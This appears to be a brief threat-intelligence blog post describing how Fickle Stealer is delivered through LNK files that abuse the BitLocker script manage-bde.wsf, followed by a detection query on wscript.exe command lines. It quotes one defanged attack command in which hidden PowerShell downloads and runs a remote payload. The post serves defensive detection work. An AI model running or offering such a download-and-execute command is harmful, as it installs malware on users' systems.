202. Adversaries Misuse a Script for Managing BitLocker to Deliver Fickle Stealer
Hello everyone!
Stealers again! This time we're going to talk about Fickle Stealer an an interesting delivery method leveraged by the threat actors.
So, the adversary used maclious LNK files to misuse a script for managing BitLocker (manage-bde.wsf) to download and execute a PowerShell script:
"C:\Windows\System32\manage-bde.wsf" & powershell -nop -w hidden -c iex(iwr hxxps://bitacid[.]net/payload/callback.ps1) & "
The script is executed via wscript.exe, so we can build our detection logic on suspicious command line parameters:
event_type: "processcreatewin"
AND
proc_file_path: "wscript.exe"
AND
cmdline: ("manage-bde" AND "powershell" AND "hidden")
See you tomorrow!
Comments
Post a Comment